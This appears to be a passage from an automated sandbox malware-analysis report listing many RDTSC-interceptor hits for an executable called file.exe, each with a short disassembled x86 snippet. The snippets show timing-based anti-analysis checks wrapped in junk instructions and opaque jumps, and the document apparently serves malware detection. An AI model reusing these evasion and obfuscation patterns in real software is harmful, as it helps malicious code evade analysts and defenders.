Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D83F second address: A8D843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D843 second address: A8D849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D849 second address: A8D84E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F627 second address: A8F62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F62D second address: A8F631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E6EE second address: A8E711 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007FAAAC4EC6A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E711 second address: A8E729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAAC4EBB2Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E729 second address: A8E744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E744 second address: A8E7C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a xor dword ptr [ebp+122D2EF2h], edx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov ebx, 005E4757h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov edi, 6CAE48E6h 0x00000028 mov ebx, edx 0x0000002a mov eax, dword ptr [ebp+122D0CC9h] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007FAAAC4EBB28h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a jo 00007FAAAC4EBB2Ch 0x00000050 xor edi, dword ptr [ebp+122D2959h] 0x00000056 mov ebx, 59D9A100h 0x0000005b push FFFFFFFFh 0x0000005d jo 00007FAAAC4EBB27h 0x00000063 cmc 0x00000064 nop 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 jo 00007FAAAC4EBB26h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A915EC second address: A915F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A915F0 second address: A915F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A94B88 second address: A94B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9A6C9 second address: A9A6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAAAC4EBB26h 0x0000000a jnc 00007FAAAC4EBB26h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9AAAF second address: A9AAB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9AAB3 second address: A9AAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9AAB9 second address: A9AABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9F2CE second address: A9F2D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9F2D5 second address: A9F307 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAAAC4EC6A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FAAAC4EC6B4h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jbe 00007FAAAC4EC6A6h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9F307 second address: A9F30D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9F30D second address: A9F311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9F414 second address: A9F436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FAAAC4EBB26h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAAAC4EBB2Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9F436 second address: A9F44B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jc 00007FAAAC4EC6A6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA0694 second address: AA06AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAC4EBB32h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA2899 second address: AA28AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EC6B0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA68EA second address: AA6939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EBB38h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FAAAC4EBB43h 0x00000014 pushad 0x00000015 ja 00007FAAAC4EBB26h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6939 second address: AA6940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6C3C second address: AA6C64 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jne 00007FAAAC4EBB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007FAAAC4EBB37h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6E15 second address: AA6E1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6F96 second address: AA6FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAAAC4EBB2Bh 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6FA9 second address: AA6FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6FB4 second address: AA6FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAAAC4EBB26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6FBE second address: AA6FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6FC2 second address: AA6FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6FCF second address: AA6FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6FD3 second address: AA6FD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6FD7 second address: AA6FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA72B8 second address: AA72C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jg 00007FAAAC4EBB26h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA72C5 second address: AA72CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA72CD second address: AA72D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA744B second address: AA747C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EC6B9h 0x00000009 pop edx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FAAAC4EC6ACh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA747C second address: AA7489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FAAAC4EBB26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA7489 second address: AA748D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA748D second address: AA7493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38B1F second address: A38B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38B25 second address: A38B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAAAC4EBB26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAEF2D second address: AAEF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF2F5 second address: AAF30F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAAAC4EBB26h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAAC4EBB2Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF30F second address: AAF322 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAAC4EC6A6h 0x00000008 jnp 00007FAAAC4EC6A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF772 second address: AAF776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF8AB second address: AAF8AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF8AF second address: AAF8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF8B7 second address: AAF8D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FAAAC4EC6AEh 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB1392 second address: AB1399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB6B6B second address: AB6B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5662 second address: AB56AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAC4EBB33h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FAAAC4EBB2Eh 0x0000000f jl 00007FAAAC4EBB26h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FAAAC4EBB39h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5B26 second address: AB5B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAAAC4EC6A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5B30 second address: AB5B36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5B36 second address: AB5B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5C6B second address: AB5C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5E07 second address: AB5E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5E0D second address: AB5E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5F86 second address: AB5FFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ACh 0x00000007 jmp 00007FAAAC4EC6AFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FAAAC4EC6AFh 0x00000013 pop esi 0x00000014 pushad 0x00000015 pushad 0x00000016 ja 00007FAAAC4EC6A6h 0x0000001c jp 00007FAAAC4EC6A6h 0x00000022 popad 0x00000023 pushad 0x00000024 jmp 00007FAAAC4EC6B4h 0x00000029 jmp 00007FAAAC4EC6ADh 0x0000002e jmp 00007FAAAC4EC6AEh 0x00000033 jp 00007FAAAC4EC6A6h 0x00000039 popad 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5FFF second address: AB6003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB6003 second address: AB6009 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB69EC second address: AB69FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007FAAAC4EBB2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB69FD second address: AB6A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EC6B2h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAAC4EC6ACh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5259 second address: AB525D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A37063 second address: A37072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75239 second address: A7524E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EBB30h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7524E second address: A5B256 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FAAAC4EC6A8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov dh, 45h 0x00000026 lea eax, dword ptr [ebp+12479F6Fh] 0x0000002c mov ecx, dword ptr [ebp+122D2B41h] 0x00000032 push eax 0x00000033 jmp 00007FAAAC4EC6B4h 0x00000038 mov dword ptr [esp], eax 0x0000003b mov ch, B8h 0x0000003d call dword ptr [ebp+122D3352h] 0x00000043 push eax 0x00000044 jne 00007FAAAC4EC6B4h 0x0000004a push eax 0x0000004b push edx 0x0000004c jp 00007FAAAC4EC6A6h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75333 second address: A7534C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7534C second address: A7536A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAC4EC6B9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75998 second address: A759A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAAAC4EBB26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7A175 second address: A7A179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75C34 second address: A75CB8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAAC4EBB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FAAAC4EBB31h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FAAAC4EBB28h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b or edx, 11C17B7Bh 0x00000031 push 00000004h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FAAAC4EBB28h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d push eax 0x0000004e jp 00007FAAAC4EBB3Bh 0x00000054 pushad 0x00000055 jmp 00007FAAAC4EBB2Dh 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76132 second address: A76147 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7626E second address: A76272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76272 second address: A7627C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAAAC4EC6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB2AD second address: ABB2D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FAAAC4EBB26h 0x00000009 jmp 00007FAAAC4EBB37h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB428 second address: ABB446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAC4EC6B9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB446 second address: ABB482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAAAC4EBB26h 0x0000000a jmp 00007FAAAC4EBB32h 0x0000000f popad 0x00000010 jne 00007FAAAC4EBB2Eh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007FAAAC4EBB26h 0x00000021 jnp 00007FAAAC4EBB26h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB5D8 second address: ABB5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB5DE second address: ABB5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB5E2 second address: ABB5E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB5E6 second address: ABB606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EBB2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAAC4EBB2Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB606 second address: ABB616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ACh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB616 second address: ABB62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAAC4EBB2Bh 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABBA0F second address: ABBA15 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABBA15 second address: ABBA4A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAAAC4EBB50h 0x00000008 jmp 00007FAAAC4EBB36h 0x0000000d jmp 00007FAAAC4EBB34h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABBA4A second address: ABBA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c ja 00007FAAAC4EC6BBh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABBA75 second address: ABBA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABBA79 second address: ABBA7F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
